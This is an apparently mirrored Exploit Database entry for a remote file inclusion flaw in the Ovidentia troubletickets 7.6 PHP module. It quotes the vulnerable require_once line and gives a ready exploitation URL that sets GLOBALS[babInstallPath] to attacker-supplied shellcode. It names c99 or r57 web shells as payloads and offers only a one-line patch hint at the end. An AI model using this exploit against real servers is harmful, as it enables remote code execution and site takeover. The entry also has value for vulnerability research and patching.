Ovidentia troubleticketsModule 7.6 – Remote File Inclusion

• Exploit Database
• 17 阅读

• 作者： bd0rk
  日期： 2016-04-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39688/

• # Title: Ovidentia Module troubletickets 7.6 GLOBALS[babInstallPath] Remote File Inclusion Vulnerability
  # Author: bd0rk || SCHOOL-OF-HACK.NET
  # eMail: bd0rk[at]hackermail.com
  # Website: http://www.school-of-hack.net
  # Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Ftroubletickets&file=troubletickets-7-6.zip&idf=838
  
  Proof-of-Concept:
  
  Vuln.-Code in /troubletickets-7-6/programs/statistique_evolution.php line 16
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
  require_once $GLOBALS['babInstallPath'].'utilit/dateTime.php';
  
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
  [+]Usage: http://[someone]/troubletickets-7-6/programs/statistique_evolution.php?GLOBALS[babInstallPath]=[SHELLCODE]
  
  The problem: The GLOBALS[babInstallPath]-parameter isn't declared before require_once.
   So an attacker can inject some php-shellcode (c99 or r57 for example) 'bout it.
   It's no problem to patch it!
   Declare this parameter or use an alert!
  
  
  Greetings from bd0rk. HackThePlanet!